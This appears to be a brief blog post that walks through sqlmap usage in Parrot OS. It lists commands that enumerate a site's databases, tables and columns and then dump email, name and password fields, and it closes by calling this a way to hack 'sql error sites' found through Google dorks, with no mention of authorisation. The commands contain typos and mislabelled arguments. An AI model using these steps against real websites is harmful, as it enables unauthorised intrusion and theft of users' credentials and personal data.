How to use Sqlmap in Parrot o sytem Steps to use sqlmap in Parrot os: sqlmap -u http://testweb.com/listproducts.php?cat...
How to use Sqlmap in Parrot o sytem
Steps to use sqlmap in Parrot os:
sqlmap -u http://testweb.com/listproducts.php?cat=1 --dbs
sqlmap -u http://testweb.com/listproducts.php?cat=1 -D tablename --tables
sqlmap -u http://testweb.com/listproducts.php?cat=1 -D tablename-T columnname --columns
sqlmap -u http://testweb.com/listproducts.php?cat=1 -D tablename -T columnname -C email,name,pass --dump
Enjoy!!
Note: Only sql error sites can be hacked with this method.You can find sql error sites by google drocks and you can find google drocks from here.




No comments